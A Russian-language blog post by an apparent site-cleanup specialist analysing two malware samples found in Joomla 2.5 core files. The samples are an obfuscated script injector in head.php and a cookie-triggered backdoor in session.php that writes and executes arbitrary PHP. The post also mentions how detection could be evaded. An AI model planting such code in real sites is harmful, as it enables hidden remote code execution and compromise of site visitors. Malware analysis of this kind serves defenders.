Сегодня моя вирусная коллекция пополнилась новыми экземплярами. Интересны тем что очень специализированы. Автор явно знает Джумлу на приличном уровне.
Фрагмент 1. Вставка левого javascript-a
libraries/joomla/document/html/renderer/head.php
1 |
$document->_scripts[gzuncompress(base64_decode('eJzT189JLUlOLMrXqzAyySjSS87P1c8q1k/OLy1JLdLLKrYvSy2yNdQz0jM0BABJAw5e'))] = array('mime' => 'text/javascript', 'defer' => '', 'async' => ''); |
Разоблачить сие можно только по традиционно используемым для шифрования ссылки функциям gzuncompress() и base64_decode().
Фрагмент 2.
libraries/joomla/session/session.php
1 2 3 4 5 6 7 8 9 |
if(md5(reset($_COOKIE))=='1df578200010b48184c1a9a825b59e7a' && count($_COOKIE)>3) { $_sessions_debug_data = base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($_COOKIE,count($_COOKIE)-3)))); $_session_debug_stream = tempnam(sys_get_temp_dir(),'tmpr'); file_put_contents($_session_debug_stream , chr(60).chr(63).'php '.$_sessions_debug_data); echo '<btxet>'; include($_session_debug_stream); echo '</btxet>'; unlink($_session_debug_stream); } |
второй фрагмент не менее интересен. Из специально подготовленных кук, формируется вредоносный скрипт и записывается во временную директорию. А затем тут же через include исполняется. Если код чуть подправить и убрать base64_decode и chr(60).chr(63). , а это можно сделать, то его крайне сложно будет детектировать.
Все это обнаружено в Джумле 2.5 но ничто не мешает их модифицировать и для других версий этой CMS
И да, если вы подозреваете что не в состоянии сами справиться с вирусом, обращайтесь. Вылечу. Расценки скромные 800 р. 6 месяцев гарантии на мою работу.
Контакты
Свежие комментарии